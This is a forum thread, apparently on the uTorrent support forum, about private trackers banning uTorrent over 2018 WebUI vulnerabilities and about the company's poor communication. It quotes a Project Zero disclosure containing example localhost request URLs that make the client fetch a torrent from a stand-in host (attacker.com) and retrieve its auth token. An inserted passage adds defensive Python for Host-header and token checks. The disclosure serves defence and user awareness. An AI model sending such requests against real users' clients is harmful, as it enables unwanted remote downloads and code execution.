uTorrent on the way out?


unknownsoldierx

8 hours ago, unknownsoldierx said:

Numerous trackers

Numerous?

After a quick Google, all I could find was that GazelleGames (private torrent tracker) banned all versions.

Then they did a u-turn of sorts and allowed some builds...

Quote

uTorrent 1.8.x, 2.0.4, 2.1.x and 2.2.x.

https://www.reddit.com/r/trackers/comments/808dyy/gazellegames_bans_all_versions_of_utorrent/

 


It was more of a comment on the lack of response, disclosures, or warnings of the exploits to users. There's no mention of this security problem on the utorrent website, blog, or forums.

So far it does seem to be private trackers.

 

.Click Group TheVault ThePlace TheGeeks TheEmpire TheOccult TheShow - removing utorrent 3.x off whitelist
https://www.reddit.com/r/trackers/comments/80np6r/click_group_thevault_theplace_thegeeks_theempire/

Awesome-hd uTorrent announcement
https://www.reddit.com/r/trackers/comments/80flpq/awesomehd_utorrent_announcement/
"uTorrent 3.x will be removed from the whitelist indefinitely."

APL: uTorrent versions 3.0 - 3.5.2 banned.
https://www.reddit.com/r/trackers/comments/80cxof/btn_utorrent_3x_removed_from_the_whitelist/

FILELIST UTorrent announcement
https://www.reddit.com/r/trackers/comments/80cx0e/filelist_utorrent_announcement/

PTP bans uTorrent
https://www.reddit.com/r/trackers/comments/7zvfig/ptp_bans_utorrent/

All versions of uTorrent removed from the Oppaitime whitelist.
https://www.reddit.com/r/trackers/comments/7zv0yi/all_versions_of_utorrent_removed_from_the/

RED announces uT 3.x ban, 2.x phase out plan.
https://www.reddit.com/r/trackers/comments/7zum5y/red_announces_ut_3x_ban_2x_phase_out_plan/

All versions of uTorrent removed from the AnimeBytes whitelist.
https://www.reddit.com/r/trackers/comments/7zshwu/all_versions_of_utorrent_removed_from_the/


From the link you posted

Quote

The team began rolling out the update to beta uTorrent Windows users via the auto update mechanism on Feb 16, 2018

From the dude that discovered the exploit, written on Feb 20:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1524

Quote

It turns out that BitTorrent just added an additional token to uTorrent Web, and was still vulnerable to the same attack.

Previously, a request would look like this:

http://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent

But now, they added a second token, so it looks like this:

http://127.0.0.1:19575/gui/?token=newtoken&localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent

So...you just have to fetch that token as well, which comes from:

http://127.0.0.1:19575/gui/token.html?localauth=token:

Therefore, this issue is still exploitable. The vulnerability is now public because a patch is available, and BitTorrent have already exhausted their 90 days anyway. I see no other option for affected users but to stop using uTorrent Web and contact BitTorrent and request a comprehensive patch, we've done all we can to give BitTorrent adequate time, information and feedback and the issue remains unsolved.

 

This is what I see referenced in discussion. People are saying utorrent is still vulnerable, but it seems they are all confusing it with uTorrent Web.

If regular uTorrent is indeed fixed, there should be a statement released about it. More than just a post on the uTorrent engineering blog. There's a lot of misinformation going around.


There's also a heap of fixes for the current stable:

Quote

– Use proper device pairing password when updating device info graphic
– Point Remote “Learn More” link to better URL
– Disable localhost/search lookup when making searches. Do not rely on the localhost port-10k discoverability
– Use a CRNG as a WebUI token source
– Require device/service pairing or standard webui authentication for the /proxy endpoint
– Sanity check Host header on HTTP requests
– Remove automatic discoverability feature over port 10000. The setting net.discoverable no longer exists.
– WebUI action getsettings is only allowed for fully authenticated user (not guest)
– Fix crash when sending malformed requests to /fileserve
– Fix forced re-install mode when same version is already installed
– Set uninstaller prompt dialog title
– Remove Nexway cart URLs
– License key information is no longer exposed via WebUI

http://blog.utorrent.com/releases/

A sticky on the forum clarifying what's what regarding this security vulnerability would be a good idea, rather than leaving it to users to hunt down the information surrounding this.

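Two of the changelog entries above ("Sanity check Host header on HTTP requests" and "Use a CRNG as a WebUI token source") are the checks that address the request pattern quoted from the Project Zero report. The following is an added illustration of what such gating looks like for a loopback-only WebUI; it is not uTorrent's code. Port 19575 is taken from the quoted URLs, and the hostnames and tokens are constructed.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Hostnames a loopback-only WebUI should accept in the Host header.
LOOPBACK_HOSTS = {"127.0.0.1", "localhost", "::1"}
LISTEN_PORT = 19575  # port used in the request URLs quoted above


def generate_token() -> str:
    """Mint a WebUI token from the OS CSPRNG rather than a guessable source."""
    return secrets.token_urlsafe(32)


def host_is_local(host_header: str, listen_port: int = LISTEN_PORT) -> bool:
    """Accept only a loopback host, with no port or exactly the listening port.

    A browser that reached the service through a rebound DNS name sends that
    name in Host, so a strict check here refuses the request before any token
    logic runs. The same check must guard the page that hands out the token.
    """
    try:
        parts = urlsplit("//" + (host_header or ""))
        hostname, port = parts.hostname, parts.port  # .port raises on junk
    except ValueError:
        return False
    if parts.path or parts.query or parts.fragment:
        return False  # a Host value must be host[:port] and nothing else
    return hostname in LOOPBACK_HOSTS and port in (None, listen_port)


def authorize(request_target: str, host_header: str, expected_token: str) -> bool:
    """Gate a WebUI request: loopback Host first, then the CSPRNG token."""
    if not host_is_local(host_header):
        return False
    presented = parse_qs(urlsplit(request_target).query).get("token", [""])[0]
    # Constant-time comparison so response timing does not leak the token.
    return hmac.compare_digest(presented.encode(), expected_token.encode())


if __name__ == "__main__":
    token = generate_token()
    # Constructed request target; the URL parameter is a placeholder.
    ok = f"/gui/?token={token}&action=add-url&url=http://example.invalid/f.torrent"
    print(authorize(ok, "127.0.0.1:19575", token))        # True: local host, right token
    print(authorize(ok, "rebound.example:19575", token))  # False: Host is not loopback
    print(authorize(ok, "localhost", "other-token"))      # False: token mismatch
```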

This is exactly as unknownsoldier has said, people are saying the fix isn't complete and many places have banned it as a result.
Unless uTorrent shows it's actually fixed properly, this client is, as was said, "on the way out" and basically dead. I've already had to switch to qBittorrent,
which has been a pain in the arse as it's nowhere near as reliable as uTorrent and is quite buggy still. Unfortunately usability isn't on the list as far as client approvals go..

I told them they needed to clarify things and sent them a link to that discussion mentioned above but they've done nothing..
The communication here has always been poor and this seems to extend further, they're killing their client.

Poor response time and the inability to prove that the fix is complete. Trackers aren't taking any chances.. There was already distrust with this client and now people seem to have had enough. I also asked about whether the flash exploit had been plugged, as other trackers jumped on that first back with 3.3.x, but no response about that either. Honestly this is a simple fix, I'd like to see this client approved again by trackers but it requires something I don't think the Bittorrent team can muster.. Timely and thorough communication.


Also, even more infuriating, apparently regular uTorrent and the new uTorrent Web share the same PeerID and report themselves as the same client. Site admins say that since uTorrent Web is still vulnerable, and they can't tell the difference between the two clients, even if classic uTorrent is fixed it doesn't matter.


On 3/3/2018 at 2:27 PM, unknownsoldierx said:

Numerous trackers are now banning all versions of uTorrent because of the latest exploits. I see no statement on the uTorrent blog or even any discussion on the forums. Why?

Put this way: how and why trackers do what they do has nothing to do with utorrent. You need to contact the site where you're getting your torrents and complain to them.

14 hours ago, unknownsoldierx said:

Also, even more infuriating, apparently regular uTorrent and the new uTorrent Web share the same PeerID and report themselves as the same client. Site admins say that since uTorrent Web is still vulnerable, and they can't tell the difference between the two clients, even if classic uTorrent is fixed it doesn't matter.

Not sure what you're doing but I have no problems using utorrent and downloading torrents. Maybe one should stay away from tracked torrents and sites to avoid DMCA blocks or ISP blocks.


Testing has been done to show that the new release doesn't fully solve the problem, even if the original vulnerability doesn't work anymore. I'd like to see a proper fix that actually gets rid of the error, or at the least allows us to shut down the web interface that the exploits target. I don't want to change to a different client and the fact that this hasn't been solved is prompting a fair number of sites to continue banning 3.5.3. And the revelation above that the peer id for the new web client is the same as classic, well, shouldn't different clients have different peer ids? Utorrent, please fix this!!!!

And @PiusX, if the client is getting banned because it still has a security error, that is certainly utorrent's problem, and utorrent does need to care about user and torrent site safety. 


Indeed, many private trackers feel as though they cannot trust the word of Bittorrent Inc when they claim that the vulnerability was fixed, so a good portion of influential private trackers have banned all of 3.x, some saying they will never whitelist newer versions again and only allow 2.2.1 and 2.0.4; and a few have even blanket banned all of uTorrent.

You guys need to make this a top priority and pay an independent security researcher to make sure the vulnerability is fully fixed and have them put out the report so that private trackers again consider whitelisting a 3.x version, otherwise you are going to lose many users and uTorrent and Bittorrent [the client] will no longer be financially sustainable products. 

Clients do not succeed in usage rates if a majority of private trackers ban their usage. Exhibit A: Azureus - 10 or so years ago almost all private trackers banned the use of it. And it quickly faded into irrelevancy. 

This needs to be taken very seriously unless you no longer care about this product. While you're at it, hire better developers and make them more visible with Twitter accounts and e-mail addresses that users can contact. Set up an issue tracker that users can add to, with an attachment feature so they can attach crash dumps, memory dumps, log files, screenshots. Currently, the Bittorrent Inc developers seem to be invisible and are unreachable. They certainly don't seem to read this forum. I sometimes wonder if they care or if this is just a job to them and nothing more.


Rafi, you know how piss poor Bittorrent Inc is at communication. Hell, they used to barely post logs. An admin comes in for a bit once in a blue moon..

I've told them on the forums many times they need to buck their ideas up, they can't be bothered.. just want to "keep the lights on" while doing sweet F all of anything.
It's on the decline and so we know how that goes. If they listened to me, they'd be in a better place. They don't listen and they don't care.. these are obvious facts.


All I was saying is that a "community" is best at helping itself, and now fewer people are visiting the forums. This is both good and bad: it shows there are fewer problems in the client, but also less help for those who need help.

And true enough, the devs' presence/support here is and was minimal. When (if) they release 4.x with plenty of bugs, that would be the time to be here... ;)


One of the biggest issues was how hard it was for them to be contacted about this hole in the first place..

We needed them to be active and proactive in communication, not a new client which apparently doesn't distinguish itself from its other clients..
This all just goes from bad to worse. Now I'm forced to deal with the bug-ridden qBittorrent and it's only a matter of time before utorrent is deleted..

Was great while it lasted, RIP. 


Archived

This topic is now archived and is closed to further replies.
